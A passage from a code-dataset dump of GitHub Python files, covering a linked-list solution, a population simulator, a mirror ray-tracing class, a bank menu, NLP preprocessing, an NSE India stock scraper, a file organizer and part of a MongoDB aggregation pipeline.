return None\n carry = 0\n dummy = ListNode(0)\n cur = dummy\n while l1 or l2 or carry > 0:\n v1 = l1.val if l1 else 0\n v2 = l2.val if l2 else 0\n l1 = l1.next if l1 else None\n l2 = l2.next if l2 else None\n result = v1 + v2 + carry\n carry = 0\n if result > 9:\n carry = 1\n result = result % 10\n cur.next = ListNode(result)\n cur = cur.next\n return dummy.next\n\n# Setup\na = ListNode(9)\nb = ListNode(9)\nc = ListNode(1)\n\nd = ListNode(1)\ne = ListNode(2)\na.next = b\nb.next = c\n\nd.next = e\n\nprint(\"\")\nprint(\"Adding two numbers:\")\na.print()\nprint(\"\\n\")\nd.print()\nresult = addTwoNumbers(a, d)\nprint(\"\\n\")\nprint(\"After adding:\")\nresult.print()\n","repo_name":"Voley/AlgorithmicProblemsV2","sub_path":"LinkedLists/add/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"10158681873","text":"import numpy as np\nfrom faker import Faker\nimport random\nimport matplotlib.pyplot as plt\nimport networkx as nx\nfrom collections import Counter\n\nfake = Faker()\n\ndebug = False\n\n\"\"\"\n\nImplement genetics system: \n inherit good or bad traits\n eugenics pushes for good traits\n but small gene pool makes emergence of bad traits more likely\n\n\"\"\"\n\nclass Person:\n ID = 0\n\n def __init__(self, age):\n Person.ID += 1\n self.ID = Person.ID\n self.age = age\n self._surname = None\n # Define is_child based on age\n self.is_child = True if self.age < 18 else False\n # 50/50 gender probability\n self.gender = random.choice([\"male\", \"female\"])\n if self.gender == \"male\":\n self.first_name = fake.first_name_male()\n elif self.gender == \"female\":\n self.first_name = fake.first_name_female()\n self.name = self.first_name\n\n @property\n def surname(self):\n return self._surname\n\n @surname.setter\n def surname(self, value):\n self._surname = value\n if self._surname is not None:\n self.name = self.first_name + \" \" + self._surname\n\n # Recent stats: 3% of population is homosexual and 4% is bisexual\n orientation_prob = random.random()\n if orientation_prob < 0.03:\n orientation = \"homosexual\"\n elif orientation_prob < 0.07:\n orientation = \"bisexual\"\n else:\n orientation = \"heterosexual\"\n self.orientation = orientation\n\n if self.orientation == \"heterosexual\":\n if self.gender == \"male\":\n self.spouse_gender = 
\"female\"\n else:\n self.spouse_gender = \"male\"\n elif self.orientation == \"homosexual\":\n if self.gender == \"male\":\n self.spouse_gender = \"male\"\n else:\n self.spouse_gender = \"female\"\n else:\n self.spouse_gender = [\"male\", \"female\"]\n\n if self.age < 18:\n self.is_child = True\n else:\n self.is_child = False\n\n self.spouse = None\n self.parents = []\n self.children = []\n\n\nclass Family:\n def __init__(self, parents, surname):\n self.parents = parents\n self.surname = surname\n self.children = []\n\n def add_child(self, child):\n self.children.append(child)\n for parent in self.parents:\n parent.children.append(child)\n\n\ndef simulate_population(population_size, initial_family_count, debug, time_steps):\n fake = Faker()\n Faker.seed(0) # Set seed for consistent data generation\n\n population = []\n families = []\n step = 0\n AVG_LIFESPAN = 80 + (step // 10)\n\n\n\n\n # Initialize the population\n print(\"Initializing the population...\")\n print(\"Initializing age distribution...\")\n age_distribution = [random.randint(0, 15) for _ in range(int(population_size * 0.55))] + [random.randint(35, 60) for\n _ in range(int(population_size * 0.45))]\n\n surnames = set()\n # Populate array of unique surnames\n while len(surnames) < population_size / 2:\n surname = fake.last_name()\n if surname not in surnames:\n surnames.add(surname)\n\n if debug:\n print(f\"{len(surnames)} total surnames generated. \")\n for surname in surnames:\n print(surname)\n\n print(\"Initializing raw population...\")\n debug_counter = 0\n for i in range(population_size):\n # Initialize the population with age according to the age distribution\n age = age_distribution[i]\n # Initialize person\n person = Person(age)\n # Add person to population\n population.append(person)\n\n # Give adults a surname\n if person.is_child is False:\n try:\n print(list(surnames))\n person.surname = random.choice(list(surnames))\n # Remove surname from pool once assigned to assure uniqueness\n surnames.remove(person.surname)\n except:\n print(\"Error: Not enough surnames to assign to population. 
Len: \" + str(len(surnames)))\n exit(1)\n else:\n person.surname = None\n\n if debug:\n debug_counter+=1\n print(f\"{debug_counter} Surname assigned: \" + person.name)\n\n\n\n counter = Counter(person.surname for person in population)\n duplicates = [item for item, count in counter.items() if count > 1 and item is not None and item is not True]\n if debug:\n print(\"duplicates = \" + str(duplicates))\n if len(duplicates) > 0:\n print(\"Error: Duplicate surnames detected: \" + str(len(duplicates)) + ' ' + str(duplicates))\n exit(1)\n\n for person in population:\n if person.is_child is False:\n print(person.name)\n\n # DEBUG: Print population statistics\n\n\n # if debug is True:\n # # for person in population:\n # # print(person.name + ' ' + str(person.age))\n # max_age = max(person.age for person in population)\n # print(f\"Minimum age: {min(person.age for person in population)}\")\n # print(f\"Maximum age: {max_age}\")\n # age_histogram = [0] * (max_age + 1)\n # orientation_histogram = [0] * 3\n #\n # for person in population:\n # if person.age <= max_age:\n # age_histogram[person.age] += 1\n # else:\n # age_histogram.append(1)\n # max_age += 1\n #\n # plt.bar(range(len(age_histogram)), age_histogram)\n # plt.xlabel('Age')\n # plt.ylabel('Population Count')\n # plt.title('Population Demographics by Age, Initial Population')\n # plt.show()\n #\n # total_males = 0\n # for person in population:\n # if person.gender == \"male\":\n # total_males += 1\n # print(f\"Total males: {total_males}\\nTotal females: {500 - total_males}\\nGender ratio: {total_males / 500}\")\n #\n # for person in population:\n # if person.orientation == \"heterosexual\":\n # orientation_histogram[0] += 1\n # elif person.orientation == \"homosexual\":\n # orientation_histogram[1] += 1\n # else:\n # orientation_histogram[2] += 1\n #\n # labels = [\"heterosexual\", \"homosexual\", \"bisexual\"]\n # x = range(len(orientation_histogram))\n # plt.bar(x, orientation_histogram, tick_label=labels)\n # plt.show()\n\n # Simulate population dynamics for the given number of time steps (years)\n print(\"Simulating population dynamics...\")\n max_age = max(person.age for person in population)\n age_histogram = [0] * (max_age + 1)\n for step in range(time_steps):\n print(f\"Simulating year {step}...\")\n # Update ages and track demographics\n print(\"Aging population...\")\n for person in population:\n person.age += 1\n if person.age <= max_age:\n age_histogram[person.age] += 1\n else:\n age_histogram.append(1)\n max_age += 1\n\n # Determine who dies (based on age and life expectancy)\n # Define Gompertz-Makeham parameters\n alpha = 0.05 # Baseline mortality rate\n beta = 0.001 # Rate of age-related increase in mortality\n\n print(\"Determining mortality due to old age...\")\n # Determine who dies based on age and Gompertz-Makeham distribution\n for family in families:\n for parent in family.parents:\n age_difference = parent.age - AVG_LIFESPAN\n if age_difference >= 0:\n survival_probability = np.exp(alpha + beta * age_difference)\n if random.random() > survival_probability:\n family.parents.remove(parent)\n population.remove(parent)\n print(f\"{parent.first_name} {parent.surname} died at age {parent.age}\")\n\n\n print(\"Generating families...\")\n # Allow couples to form families and have children\n eligible_parents = [person for person in population if 20 <= person.age <= 50]\n print(\"Generating parenting couples...\")\n parents = []\n print(\", \" .join(person.name for person in eligible_parents))\n while len(eligible_parents) >= 
2:\n\n            while True:\n                print(\"Choosing first parent...\")\n                parents.append(random.choice(eligible_parents))\n                print(f\"Parent: {parents[0].name}, {parents[0].age}, {parents[0].orientation}\\n\\n\")\n                print(\"Eligible parents: \" + str(len(eligible_parents)))\n                while True:\n                    parents.append(random.choice(eligible_parents))\n                    for person in parents:\n                        print(f\"Person: {person.name}, {person.age}, {person.orientation}, {person.spouse_gender}\")\n\n                    if debug is True:\n                        if len(parents) == 2:\n                            print(\"First parent gender:\", parents[0].gender)\n                            print(\"First parent spouse gender:\", parents[0].spouse_gender)\n                            print(\"Second parent gender:\", parents[1].gender)\n                            print(\"Second parent spouse gender:\", parents[1].spouse_gender)\n\n\n                    if parents[1].gender in parents[0].spouse_gender and parents[0].gender in parents[1].spouse_gender:\n                        print(\"Eligible\\n\")\n\n                        eligible_parents.remove(parents[0])\n                        eligible_parents.remove(parents[1])\n                        break\n                    else:\n                        print(\"Not eligible\\n\")\n                        parents.remove(parents[1])\n\n                if parents[0].gender in parents[1].spouse_gender and parents[1].gender in parents[0].spouse_gender:\n                    print(\"Couple formed!\")\n                    # If hetero, assign male surname, otherwise doesn't matter\n                    if parents[0].gender == \"male\":\n                        parents[1].surname = parents[0].surname\n                    else:\n                        parents[0].surname = parents[1].surname\n                    for parent in parents:\n                        print(f\"{parent.name}, {parent.age}, {parent.orientation}\")\n                    family_surname = parents[0].surname\n\n                print(\"Remaining eligible parents: \" + str(len(eligible_parents)))\n                if len(parents) != 2:\n                    print(\"Parents need to be two. Resetting...\")\n                    parents = []\n                    continue\n                break\n\n\n            # Assign spouses\n            if len(parents) != 2:\n                exit(1)\n            parents[0].spouse = parents[1]\n            parents[1].spouse = parents[0]\n\n            family = Family(parents, family_surname)\n            families.append(family)\n\n            # Assign any children without parents to this family, up to 3\n            print(\"Assigning children to family...\")\n            for person in population:\n                # If child without parents, assign to family\n                if person.is_child is True and person.parents == []:\n                    person.parents = parents\n                    # Patriarchal surname assignment\n                    if parents[0].gender == \"male\":\n                        person.surname = parents[0].surname\n                    else:\n                        person.surname = parents[1].surname\n                    # Add child to family\n                    family.add_child(person)\n                    print(f\"Assigned {person.name} to family {family_surname}\")\n                    # If family has 3 children, stop assigning children to this family\n                    if len(family.children) >= 3:\n                        break\n\n\n            # if population capacity not yet reached, have children\n            if len(population) < population_size:\n                print(\"Adding children to the population...\")\n                child_surname = family_surname\n                # Person() takes only an age; the surname is assigned through its property setter\n                child = Person(0)\n                child.surname = child_surname\n                family.add_child(child)\n                population.append(child)\n                eligible_parents.append(child)\n                print(f\"{parents[0].name} and {parents[1].name} had a baby named {child.first_name}!\")\n\n        # Print family lineages\n        if step % 10 == 0:\n            print(f\"Family Lineages at Year {step}:\")\n            for i, family in enumerate(families):\n                if i >= 10:\n                    break\n                print(f\"Couples: {', '.join([parent.name for parent in family.parents])}\")\n                for child in family.children:\n                    print(f\"  Child: {child.name} ({child.gender})\")\n\n    # Plot age histogram\n    plt.bar(range(len(age_histogram)), age_histogram)\n    plt.xlabel('Age')\n    plt.ylabel('Population Count')\n    plt.title('Population Demographics by Age')\n    plt.show()\n\n    # View lineage of a person\n    def view_lineage(person):\n        G = nx.DiGraph()\n\n        # Create nodes for each person\n        for p in population:\n            G.add_node(p.name)\n\n        # 
Create edges for family relationships\n        for family in families:\n            for child in family.children:\n                parent1_name = family.parents[0].name\n                parent2_name = family.parents[1].name\n                child_name = child.name\n                G.add_edge(parent1_name, child_name)\n                G.add_edge(parent2_name, child_name)\n\n        # Draw family tree\n        pos = nx.spring_layout(G)\n        nx.draw_networkx(G, pos=pos, with_labels=True)\n        plt.axis('off')\n        plt.show()\n\n    # Select a person and view their lineage\n    if len(population) > 0:\n        selected_person = random.choice(population)\n        view_lineage(selected_person)\n\n\n# Run the simulation\npopulation_size = 500\ninitial_family_count = 112\nfamily_size = 4.5\ntime_steps = 100\n\nsimulate_population(population_size, initial_family_count, debug, time_steps)\n","repo_name":"Von-R/Generational-Simulator","sub_path":"Pop_sim.py","file_name":"Pop_sim.py","file_ext":"py","file_size_in_byte":14095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}{"seq_id":"21521981673","text":"# the mirrors that we can use in the environment\nimport random as R\nfrom vector import vector as V\nimport numpy as np\n\nclass mirrors:\n\n    #PRE: T is the type of the mirror to make\n    #     S is the size of the mirror to make\n    #     O is the surface's overall orientation vector with 0 z component\n    #     L is location as vector to top left corner\n    #POST: creates an NxN array of vectors relative to the mirror surface which\n    #      represent the normal to the plane.\n    def __init__(self, T, S, O=V.vector(0,0,1), L=V.vector(0,0,0)):\n        self.seed = 123456\n        self.size = S\n        self.orientation = V.vector(O[0], O[1], O[2])\n        self.top_left = L\n        # this is the direction the pixels are moving from \"0,0\" of the mirror\n        # we assume that all elements have 0 z component for their orientation,\n        # and as such, [0,0,1] is orthogonal to self.orientation\n        out = np.cross(self.orientation.vec, [0,0,1])\n        self.right_vec = V.vector(out[0],out[1],out[2])\n        #self.right_vec is a vector of the direction of pixels following the\n        #right of the top left since cross products follow the right hand rule\n        if (T == True):\n            self.sheet = self.makeGlitter()\n        else:\n            self.sheet = self.makeFlat()\n\n    #PRE: initially assumes the orientation of the sheet to be [0 0 1]\n    #     and rotates via the vector rotate method the reflector to the correct\n    #     orientation in a 3D environment\n    #POST: makes a sheet of glitter oriented to the space\n    def makeGlitter(self):\n        R.seed(self.seed)\n        paper = []\n        for i in range(0,self.size):\n            row = []\n            for j in range(0,self.size):\n                mx = float(format(R.uniform(-1,1),'.2'))\n                my = float(format(R.uniform(-1,1),'.2'))\n                mz = np.absolute(float(format(R.uniform(-1,1),'.2')))\n                reflector = V.vector(mx, my, mz)\n                # reflector = reflector.unit() # not necessary\n                cos_theta = (reflector.dotProduct(self.orientation.vec)/\n                    (reflector.magnitude()*np.linalg.norm(self.orientation.vec)))\n                theta = np.degrees(np.arccos(cos_theta))\n                u = reflector.crossProduct(self.orientation.vec).unit()\n                # u is perpendicular to the reflector and the axis of rotation\n                reflector.rotate(u,theta)\n                row.append(reflector)\n            paper.append(row)\n        return paper\n\n    def makeFlat(self):\n        paper = []\n        f = [0,0,1] # surface normal of flat mirror with frame of reference\n                    # +z away from overall orientation\n        reflector = V.vector(f[0],f[1],f[2])\n        cos_theta = (reflector.dotProduct(self.orientation)/(reflector.magnitude()*np.linalg.norm(self.orientation.vec)))\n        theta = np.degrees(np.arccos(cos_theta))\n        # print(\"theta: \",theta)\n        u = 
reflector.crossProduct(self.orientation).unit()\n # print(\"unit axis of rotation: \",str(u))\n # u is perpendicular to the reflector and the axis of rotation\n # print(\"pre-rotation: \",str(reflector))\n reflector.rotate(u,theta)\n # print(\"post-rotation: \",str(reflector))\n for i in range(0,self.size):\n row = []\n for j in range(0,self.size):\n row.append(reflector)\n paper.append(row)\n return paper\n\n\n # Writing a pixel by pixel color representation of the mirror surface.\n # R, G, -1 and 1, -1 is 0, 1 is 300, 0 is 150\n # B, 0 and 1, 0 is 0, 1 is 300\n # writing as a .ppm file\n def draw_img(self):\n # proper .ppm header\n print_str = \"P3\\n\"+str(self.size)+\" \"+str(self.size)+\"\\n300\\n\"\n\n for i in range(0,self.size):\n for j in range(0,self.size):\n r = int(np.ceil((np.absolute(self.sheet[i][j].x))*300))\n g = int(np.ceil((np.absolute(self.sheet[i][j].y))*300))\n b = int(np.ceil((np.absolute(self.sheet[i][j].z))*300))\n color = str(r)+\" \"+str(g)+\" \"+str(b)+\"\\n\"\n # print(color)\n print_str += color\n img = open(\"mirror2.ppm\",\"r+\")\n # print(print_str)\n img.write(print_str)\n\n def __str__(self):\n print_str = \"\"\n for i in range(0,self.size):\n for j in range(0,self.size):\n print_str += str(self.sheet[i][j])+\"\\t\"\n print_str += \"\\n\"\n return print_str\n","repo_name":"jngetz/SparkleMind","sub_path":"ray_trace/environment/mirrors.py","file_name":"mirrors.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1883499428","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 22 01:58:56 2019\n\n@author: abdoulaziz\n\"\"\"\nfrom bank import Bank\n\n\n#==============================================================================\n# Important Note:\n# Create a Bank object call myBank\n#==============================================================================\nmyBank = Bank(\"myBank\")\n\n\n#==============================================================================\n# Important Note:\n# Ask customer to create a Bank account\n#==============================================================================\nprint(\"Enter your name and create an account\")\nprenom = input(\"First name :\")\nnom = input(\"Name :\")\nidc = myBank.create(nom, prenom)\nprint(\"Your customer number is :\", idc)\n\n \n#==============================================================================\n# Important Note:\n# display of a menu to allow the customer to perform operations\n#==============================================================================\nc = True\nwhile c :\n try : \n print(\"Welcome to your Bank :\")\n print(\"\\t 1.Consute my operations\")\n print(\"\\t 2.Withdraw from my account\")\n print(\"\\t 3.Deposit to my account\")\n print(\"\\t 4.Close\")\n choix = input(\"Write your choice number : \") \n choix = int(choix)\n if choix == 1:\n myBank.consulte(idc)\n elif choix == 2:\n amount = input(\"Write your amount :\")\n print(\"\\n\\n\")\n amount = int(amount)\n myBank.widthraw(idc, amount)\n elif choix == 3:\n amount = input(\"Write your amount :\")\n print(\"\\n\\n\")\n amount = int(amount)\n myBank.deposit(idc, amount)\n else :\n c = False\n except ValueError :\n print(\"You need to choose a number\\n\\n\") \n \n 
","repo_name":"abdoul91/kataBank","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"39413039810","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 14 09:54:44 2020\n\n@author: Victor HENRIO\n\"\"\"\n\nimport pandas as pd \nimport nltk \nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom nltk.corpus import stopwords\nimport spacy\nfrom spacy.lemmatizer import Lemmatizer\nfrom nltk.stem.porter import *\n\n\n\ndef tokenisation(text):\n text_trait = text.replace(\"'\",\" \").replace(\".\",\" \")\n texte_token = nltk.sent_tokenize(text_trait.lower())\n all_words = [nltk.word_tokenize(sent) for sent in texte_token]\n return all_words\n\n \ndef delete_stop_word(array_of_word):\n stop_words = stopwords.words('english') + [\",\", \".\", \"!\", \"?\", \";\", \"...\", \"'s\", \"--\", \"&\",\"'\",\"#\",\"@\",\"%\"] + [k for k in range(100)]\n for i in range(len(array_of_word)):\n array_of_word[i] = [w for w in array_of_word[i] if w not in stop_words]\n return array_of_word\n\n\ndef porterStemmerFct(array_of_word):\n #print(\"\\n\",\"#\"*40,\"\\n\",\"\\t PorterStemmerFct \\n\",\"#\"*40,\"\\n\")\n stemmer = PorterStemmer()\n singles = [stemmer.stem(plural) for plural in array_of_word[0]]\n return singles\n\ndef spacylemmatization(text):\n print(\"\\n\",\"#\"*40,\"\\n\",\"\\t Spacy Lemmatization \\n\",\"#\"*40,\"\\n\")\n nlp = spacy.load('fr_core_news_sm')\n text_nlp = nlp(text)\n for token in text_nlp :\n print (token, token.lemma_)\n\n\n\ndef clean_df(df):\n #Pas réussi à append les listes dans le df\n #cleaned_df = pd.DataFrame(columns=[\"content\"])\n cleaned_tab = []\n for index,tweet in df.itertuples():\n token_tweet = tokenisation(tweet)\n tweet_without_stpw = delete_stop_word(token_tweet)\n porter_tweet = porterStemmerFct(tweet_without_stpw) \n #cleaned_df['content'] = porter_tweet\n #cleaned_df[index].append(porter_tweet)\n cleaned_tab.append(porter_tweet)\n \n return cleaned_tab\n\n\n \n \n \nif __name__ == \"__main__\":\n \n df = pd.read_csv(\"data/1001tweets_on_bitcoin.csv\", sep=\"\\\\\", names=['Content'])\n clean = clean_df(df)\n ","repo_name":"Alex-bensimon/scraping_nlp_project","sub_path":"nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"18255522687","text":"\"\"\"\n======================\nNSE India Web Services\n======================\n\nEncapsulation for the services that communicate with nse india\n\"\"\"\n\nimport urllib\nimport pandas as pd\nfrom helper.util import resolve_config_value\nimport datetime\nimport requests\nfrom io import StringIO\nfrom bs4 import BeautifulSoup\n\nclass NseIndiaService:\n \"\"\"\n Functions\n =========\n\n get_historical_prices : Get historical prices of a stock for a given time frame\n \"\"\"\n\n def __init__(self):\n self.__config_details = resolve_config_value(['nse_india'])\n\n def get_historical_prices(self, stock_name: str, ct: datetime, pt: datetime)-> pd.DataFrame:\n \"\"\"\n Fetches the daily historical price for the stock for a given time frame\n\n Parameters\n ----------\n stock_name : str\n The nse ticker id.\n ct : datetime\n The current date which is the end time of the time frame.\n pt : datetime\n The date from where to get the historical prices.\n\n Returns\n -------\n df : dataframe\n The dataset contains the date and historical price of the 
stock.\n\n \"\"\"\n\n # change the timestamp to DD-MM-YYYY format\n ct = ct.strftime(\"%d-%m-%Y\")\n pt = pt.strftime(\"%d-%m-%Y\")\n\n head = {\n 'user-agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/87.0.4280.88 Safari/537.36 \"\n }\n\n base_url = self.__config_details['base_url']\n\n session = requests.session()\n session.get(base_url, headers=head)\n session.get(base_url + self.__config_details['stock_details'] + stock_name, headers=head) # to save cookies\n session.get(base_url + self.__config_details['stock_historical_data'] + stock_name, headers=head)\n url = base_url + self.__config_details['stock_historical_data_download'] + stock_name + \"&series=[%22EQ%22]&from=\" + pt + \"&to=\" + ct + \"&csv=true\"\n webdata = session.get(url=url, headers=head)\n\n df = pd.read_csv(StringIO(webdata.text[3:]))\n\n # formatting the dataframe to contain only Date and ltp\n df = df.drop(\n ['series ', 'OPEN ', 'HIGH ', 'LOW ', 'PREV. CLOSE ', 'close ', 'vwap ', '52W H ', '52W L ', 'VOLUME ',\n 'VALUE ', 'No of trades '], axis=1)\n\n # changing Date column to timestamp and putting it in the format of YYYY-mm-dd\n # as we will need to sort it\n df['Date '] = pd.to_datetime(df['Date ']).dt.strftime(\"%Y-%m-%d\")\n\n # sorting df based on Date column in ascending order\n df = df.sort_values(by=['Date '])\n\n return df\n\n\n def create_cookies(self, cookie: dict, ticker_name: str) -> str:\n \"\"\"\n\n Parameters\n ----------\n cookie\n\n Returns\n -------\n\n \"\"\"\n\n keys = ['nsit','ak_bmsc','nseappid','bm_sv']\n cookies = f'AKA_A2=A;'\n cookies += ' nseQuoteSymbols=[{\"symbol\":\"' +ticker_name +',\"identifier\":null,\"type\":\"equity\"}];'\n for key in keys:\n cookies += f'{key}={cookie[key]};'\n return cookies\n\n\n def get_stock_metadata(self, ticker_name: str) -> tuple:\n \"\"\"\n\n Parameters\n ----------\n ticker_name\n\n Returns\n -------\n\n \"\"\"\n\n head = {\n 'user-agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/87.0.4280.88 Safari/537.36 \",\n 'authority': 'www.nseindia.com',\n 'pragma': 'no-cache',\n 'cache-control': 'no-cache',\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36',\n 'accept': '/',\n 'sec-gpc': '1',\n 'sec-fetch-site': 'same-origin',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-dest': 'empty',\n 'referer': 'https://www.nseindia.com/get-quotes/equity?symbol='+ticker_name,\n 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',\n }\n\n base_url = self.__config_details['base_url']\n session = requests.session()\n session.get(base_url, headers=head)\n session.get(base_url + self.__config_details['base_stock_details'] + ticker_name, headers=head)\n # to save cookies\n url = base_url + self.__config_details['stock_details'] + urllib.parse.quote(ticker_name)\n head['cookie'] = self.create_cookies(session.cookies.get_dict(),ticker_name)\n #session.get(url, headers=head)\n response = requests.get(url, headers=head).json()\n\n try:\n industry = response['metadata']['industry']\n sector_pe = response['metadata']['pdSectorPe']\n symbol_pe = response['metadata']['pdSymbolPe']\n sector_industry = response['metadata']['pdSectorInd']\n except:\n print(f'{ticker_name} has no key information for metadata. 
Putting default value')\n industry = 'NA'\n sector_pe = 0.0\n symbol_pe = 0.0\n sector_industry = 'NA'\n\n try:\n status = response['securityInfo']['tradingStatus']\n outstanding_share = response['securityInfo']['issuedSize']\n except:\n print(f'{ticker_name} has no key information for security information. Putting default values')\n status = 'NA'\n outstanding_share = 0.0\n\n try:\n macro = response['industryInfo']['macro']\n #sector = response['industryInfo']['sector']\n basic_industry = response['industryInfo']['basicIndustry']\n except:\n print(f'{ticker_name} has no key information for industry information. Putting default values')\n macro = 'NA'\n basic_industry = 'NA'\n\n try:\n stock_price = response['priceInfo']['lastPrice']\n except:\n print(f'{ticker_name} has no key information for price information. Putting default values')\n stock_price = 0.0\n\n #get market capital\n url = url + self.__config_details['market_capital_suffix']\n response = requests.get(url, headers=head).json()\n\n try:\n market_capital = response['marketDeptOrderBook']['tradeInfo']['totalMarketCap']\n #free floating market capital\n ffmc = response['marketDeptOrderBook']['tradeInfo']['ffmc']\n except:\n print(f'{ticker_name} has no key information for market dept order book information. Putting default values')\n market_capital = 0.0\n ffmc = 0.0\n\n\n return stock_price, outstanding_share, basic_industry, symbol_pe, sector_pe, sector_industry, macro, industry,\\\n market_capital, ffmc, status\n\n\n","repo_name":"CapitalistFinancialGroup/FundamentalAnalysis-4","sub_path":"Codes/python/stockLib/stockLibraries/Services/NseIndiaService.py","file_name":"NseIndiaService.py","file_ext":"py","file_size_in_byte":6817,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"12427435939","text":"from os import rename\nfrom pathlib import Path\nfrom shutil import move\nfrom makes import *\n\ndestino = Path(\"direcciones/DEST.txt\")\nwith open(destino, 'r') as f:\n DEST = f.readline()\n\n\ndef clientesIn(directory, aname):\n name = makeToString(aname)\n p = Path(directory)\n res = []\n if name == 'Regimen':\n for child in p.iterdir():\n if child.is_dir():\n res = res + carpeta(child)\n else:\n for child in (Path(directory, name)).iterdir():\n if child.is_dir():\n res.append(child.name)\n return res\n\n\ndef carpeta(directory):\n p = makeToPath(directory)\n res = []\n for child in p.iterdir():\n if child.is_dir():\n res.append(child.name)\n return res\n\ndef carpetas(directory, name):\n p = makeToPath(directory)\n for child in p.iterdir():\n if child.is_dir() and name in child.name:\n return child\n return p\n\ndef carpetaInterna(DEST, cliente):\n p = Path(DEST)\n for carpeta in p.iterdir():\n if carpeta.is_dir():\n for carp in carpeta.iterdir():\n if cliente in carp.name:\n p = Path(carpeta, cliente)\n return p\n\ndef cambiarNombre(fileName,regimen,cliente, tipo, impuesto, mes, anio):\n nombre = '-'.join([cliente, tipo, impuesto, mes, anio])\n ext = fileName.suffix\n if regimen != 'Regimen':\n carpeta = carpetas(DEST, regimen)\n path = Path(carpeta, cliente)\n else:\n path = carpetaInterna(DEST, cliente)\n path = Path(path, anio)\n if not (path.exists()):\n path.mkdir()\n path = Path(path, mes)\n if not (path.exists()):\n path.mkdir()\n path = Path(path, nombre + ext)\n if not (path.exists()):\n move(fileName, path)\n else:\n parent = path.parent\n path = noRepetido(parent, nombre, ext)\n move(fileName, path)\n\ndef noRepetido(parent, nombre, ext):\n nombreAux = 
nombre\n contador = 2\n pathAux = Path(parent, nombreAux + ext)\n while True:\n if pathAux.exists():\n nombreAux = nombre + \"({})\".format(contador)\n pathAux = Path(parent, nombreAux + ext)\n contador += 1\n else:\n return pathAux\n\n\ndef mover(old_file, new_folder):\n nombre = Path(new_folder, old_file.name)\n if not nombre.exists():\n move(old_file, nombre)\n\ndef moverABasura(old_file, origen):\n destino = Path(origen, 'omitidos')\n if destino.exists():\n mover(old_file, destino)\n else:\n destino.mkdir()\n mover(old_file, destino) \n\ndef archivos(directory, names, patterns):\n '''directory: str, name:str, patter:str\n directory es el lugar donde se busca los archivos\n name es el string para filtrar los archivos\n pattern es el tipo de archivo que se busca'''\n res = []\n for pattern in patterns:\n filenames = Path(directory).glob(pattern)\n for file in filenames:\n for name in names:\n if name in file.name.lower():\n res.append(file)\n return res","repo_name":"IngErnestoAlvarez/archivador","sub_path":"funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"71683292058","text":"s = input()\n\nminimal = float('inf')\nparse = ''\n\nfor l in s:\n\tif l in '0123456789':\n\t\tparse += l\n\telse:\n\t\tif parse:\n\t\t\tres = int(parse)\n\t\t\tif res % 2 == 0:\n\t\t\t\tminimal = min(minimal, res)\n\t\tparse = ''\nif parse:\n\tres = int(parse)\n\tif res % 2 == 0:\n\t\tminimal = min(minimal, res)\nprint(minimal)","repo_name":"GenryEden/kpolyakovName","sub_path":"2526.py","file_name":"2526.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21608761018","text":"from typing import Any, Dict, Final, List\n\nfrom lighthouse.constants.fields import (\n FIELD_FILTERED_POSITIVE,\n FIELD_MUST_SEQUENCE,\n FIELD_PLATE_BARCODE,\n FIELD_PREFERENTIALLY_SEQUENCE,\n FIELD_PROCESSED,\n FIELD_SAMPLE_ID,\n)\nfrom lighthouse.constants.general import (\n FACET_COUNT_FILTERED_POSITIVE,\n FACET_COUNT_FIT_TO_PICK_SAMPLES,\n FACET_COUNT_MUST_SEQUENCE,\n FACET_COUNT_PREFERENTIALLY_SEQUENCE,\n FACET_DISTINCT_PLATE_BARCODE,\n FACET_FIT_TO_PICK_SAMPLES,\n)\n\n\"\"\"\nStage for mongo aggregation pipeline to select all the samples which are \"fit to pick\":\n- we first need to merge the fields from the priority_samples collection\n- we are then interested in samples which are:\n filtered_positive == True OR must_sequence == True\n (samples that are preferentially_sequence == True must also be filtered_positive == True\n in order to be pickable so no need to select these independantly)\n\"\"\"\nSTAGES_FIT_TO_PICK_SAMPLES: Final[List[Dict[str, Any]]] = [\n # first perform a lookup from samples to priority_samples using the '_id' field from samples on 'sample_id' on\n # priority_samples\n {\n \"$lookup\": {\n \"from\": \"priority_samples\",\n \"let\": {FIELD_SAMPLE_ID: \"$_id\"},\n \"pipeline\": [\n {\n \"$match\": {\n \"$expr\": {\n \"$and\": [\n {\"$eq\": [f\"${FIELD_SAMPLE_ID}\", f\"$${FIELD_SAMPLE_ID}\"]},\n {\"$eq\": [f\"${FIELD_PROCESSED}\", True]},\n ]\n }\n },\n },\n # include a project here to remove the other fields we are not interested in or could cause confusion\n # such as '_created_at' and '_updated_at' which are automatically created by Eve\n {\n \"$project\": {\n FIELD_PROCESSED: 1,\n FIELD_MUST_SEQUENCE: 1,\n FIELD_PREFERENTIALLY_SEQUENCE: 